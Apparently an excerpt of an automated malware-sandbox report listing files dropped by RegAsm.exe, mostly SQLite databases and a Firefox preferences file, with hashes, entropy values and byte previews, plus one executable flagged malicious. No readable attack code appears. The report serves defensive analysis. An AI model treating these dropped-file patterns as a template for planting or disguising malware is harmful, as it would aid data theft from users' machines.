                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                                          Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                                                          MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                                                          SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                                                          SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                                                          SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\CAAEBF-shm

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\CFBAFB

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                          Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\CFIEBK

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):10237
                                                                                                                                                                                                                                          Entropy (8bit):5.498288591230544
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                                                          MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                                                          SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                                                          SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                                                          SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\CGIJKJ

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\ECBGCB

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\FCFBAK

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\GDHIEH

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):155648
                                                                                                                                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\IIJDBA

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\IIJDBA-shm

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\JJECGH

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                          Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\KFCBAE

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                          Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                          MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\KJKJJE

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                          Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\FBFIJJEBKEBFCBGDAEGDHDGHCG

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\FIDAFCAF

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                          Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\FIEHIIIJDA.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):391072
                                                                                                                                                                                                                                          Entropy (8bit):7.987128579531616
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:7RNcX3Y/L03IZz1t0oQqXl8uRa2rIfpympCmd75n3L2BdEtD+gEO:7RNcXoIYZz1t0IDr2y9md75bAy1rEO
                                                                                                                                                                                                                                          MD5:C7E7CFC3ED17AEF6C67C265389593EE3
                                                                                                                                                                                                                                          SHA1:44AAEA45A59F194F33FF435A430FCBD9E7434AD5
                                                                                                                                                                                                                                          SHA-256:0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
                                                                                                                                                                                                                                          SHA-512:6C5F7A6626AAC4B583D1165C4EA3BC69E315CDCE94D3E1D3442DC9643E0983F2A80E0495BAC79D4AA0E4DB309F0AAB373D917E6AF12FFAAD333ABA21E16249D2
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................ ........@.. ..............................."....`.....................................S.......B...........x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.......................H.......@... ..............................................................[(<.sT.w/.....x~I......T..T5Q>.z..*...b.S./....2E.w.>../.d..t_.s........o>...............UV.S.....a5..JK....Y.w......#....s."....-d..-7..av..n.\....]............L...t...:2o1.!.....*..q9_O......K.^...."...)0...3..$.5.,..}.....3cx.z.....2I}.......I.e...$. .....V ..OG...Ua.$+...%\.B-.U...3....nc...,..lf...f.o..`. bO.c2...R..]0o.f....<.9..^n\.....\..2....=.nk..7 .,o.8.#.b...*.T..g}qB.[

                                                                                                                                                                                                                                          C:\ProgramData\IDAEBGCAAECAKFHIIJDBAKJDGI

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                          Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                          MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\IECBAFCA

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                          Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\IEHJJECBKKECFIEBGCAKJKECGC

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
